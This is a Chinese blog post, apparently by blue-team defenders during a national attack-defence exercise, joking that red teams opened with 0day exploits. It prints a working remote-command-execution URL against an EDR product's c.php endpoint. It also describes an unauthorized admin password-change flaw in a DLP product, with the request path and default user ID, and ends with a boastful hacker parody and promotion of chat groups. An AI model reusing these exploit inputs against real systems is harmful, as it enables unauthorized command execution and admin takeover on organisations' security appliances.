上来直接放0day大招，一天给一个月的活干完了！

昨天说：蓝队注意，吃饱点。马上开始就没时间吃饭了。红队0day满天飞，社工满地跑。打脸了，草率了。现在不是吃不吃饱，现在是没饭吃了。

之前红队，先扫描一下踩个点，再手动搞搞，现在上来就王炸加飞机，跑了。

用到0day收集

深X信EDR，下回我要见到深X信EDR的开发人员，直接打屎！原因大家都懂。

https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami    

注：whoami命令用于显示当前操作系统用户名称

除上面之外，还有任意文件读取，验证码绕过，还有就是rce。你上宽字节那个公众号上发了，可以去看看。

天X信漏洞

漏洞影响:已知版本号v3.1130.308p3_DLP.1

风险等级:高

漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.

默认用户superman的uid=1

POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1

蓝队三大错觉，我能反杀，我能秀，我觉得死不了。结果，红队大佬牛B，一天给半个月活都干完了。这就叫，犀利红队，会注入，会上传，会Xss，会破解，会嗅探，会开发，会业务，会运维，渗透，社工，调戏客服MM，无不精通，祖传三代红队。电话通知后10秒钟上线，身体强壮可持续渗透7天7夜，上千万肉鸡Ddos流量永不停歇，上至深信服、360、融信、下至刷致远OA，刷泛微OA。备用电源，千兆光纤，无线网卡，永不断网，备用电脑一台，发电机二台（含柴油100升）。本人身体强壮，健步如飞，可连续编程20小时不休息，讨论技术方案5小时不喝水，上至带项目、出方案，下至盗号威胁pm，什么都能干。本人意识猥琐，技艺娴熟，0day丰富，能上各种渗透工具，怕延迟可直接接受电话指挥，语音指挥。全面漏洞认识深刻，熟练掌握各种渗透理论，认真学习过《白帽子讲web安全》《Metasploit渗透测试指南》《Web之困》等专业书籍。深山苦练30年，一天只睡4小时，脾气好，不喷人，操作虎，意识强，渗透快，shell多，能过狗，能过盾，听指挥，千里之外取服务器首级，瞬息之间爆管理员菊花，日站如杀鸡，压安全狗如压草芥，第一时间赶到渗透现场。

一个月改半月，半个月改一天，天秀吧？昨建了个群，大家联动封ip，有位雷锋同学，建一个页面，
https://www.0daybank.org/?p=61283

红队大佬表示，

没想到呀！上来红队直接放0day大招。还是红队大佬牛逼呀，
汗，现在都不重要了，我正准备解散群，我准备回家了，你回家了吗？
新建个群吧，最新动向是否重开，到时候群里互通消息吧。

微信群老满员，点赞，点好看，分享朋友圈，之后加运营微信：shuang77169，会给你拉进群。

微信群最多200人，这个Qq群可以2000人，微信不方便就加Qq群吧。

群名称：蓝队联动作战协同中心

群   号：564828953